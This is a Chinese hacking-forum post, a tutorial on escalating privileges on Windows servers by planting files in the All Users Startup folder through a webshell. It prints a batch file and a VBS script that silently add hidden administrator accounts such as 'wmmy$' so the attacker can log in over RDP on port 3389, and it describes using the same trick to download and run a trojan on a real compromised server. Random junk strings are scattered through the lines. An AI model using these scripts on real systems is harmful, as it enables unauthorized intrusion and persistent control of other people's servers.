  
- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
             
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是) `2 ~: j; P: y1 o
启动 提权 M6 u6 D: f/ ~
C:\Docume~1\All Users\「开始」菜单\程序\启动( E& Y0 \) j8 f
在这里必须有写入权限 否则此方法无效% }& ?% c, B- T
因为我是在网吧 这里显示不了路径
% ^: D- ]" R( z$ {( U+ z我去服务器上演示给大家看5 `. h: F" \# E/ N% _
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的5 h6 U% V' m2 J! q3 R
文件 从而运行我们的文件/ \8 d7 w+ W& c0 [0 x( ?
这里有两中方式 第一种是批处理
0 F% ~3 w+ T5 ^7 i, S& k: T% t8 V1 o我们来看下目前 我机器上的用户组
6 |' D6 T u8 k( J目前我们没有521这个用户$ W; S a9 j( S9 D' L
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示% }9 q, f! f' u: y3 c
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现
$ L0 D5 N) B- P" r下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
6 B, i; T w# o8 f大家看 已经成功加入了WMMY用户# S3 u6 |2 B5 j' ~" z# P
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了/ R8 c$ Q% \/ j1 v7 F. d9 g2 c( \3 z/ w
当前终端服务端口: 3389 m/ w" P( r+ I$ t) N
系统自动登录功能未开启( {1 X/ D+ U+ m$ v0 K
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
3 w0 x/ g: w- ^9 @C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径! o3 T# E- g: B! U1 c* r; I
第一种隐蔽性太差 我们就用第二种吧; q+ G5 J3 J! p0 j$ ~2 v
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
5 l; Q' F* f, G, a U从而取得了3389的登陆权限
' V3 h4 U. G2 W5 G% p' @* k其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
2 }& Z+ H) l- a7 p" ?4 r, m4 ]基本原理都差不多 我就不多介绍了
. f9 S" p2 a @3 J5 ~+ y2 D教程结束```
* s5 d- V6 K6 f@echo off
: p0 i8 e% X8 b9 i7 _/ L4 ^! inet user 521 521 /add: C$ Q: t, B# P( e- k2 t
net localgroup administrators 521 /add) ?0 R; G' x, T8 i8 y
6 T& @0 d6 X' _+ Xon Error Resume next) k* O8 ^8 I `4 o5 Q& i) P1 |- `0 W; K
set wshshell=createobject("wscript.shell")
$ b" D! n6 I, ta=wshshell.run("net user wmmy$ 1227 /add",0)7 {, S/ E. s" r* I( G
a=wshshell.run("net localgroup administrators wmmy$ /add",0)
3 z" b @% |) K" E. m+ Q7 s }. x! C* I# t
& O) X4 @; _; w* ?3 M( ^( m$ Y3 O
点击下载, Y) v) t4 h: _\" m. f3 c
|
-
2
评分人数
-
|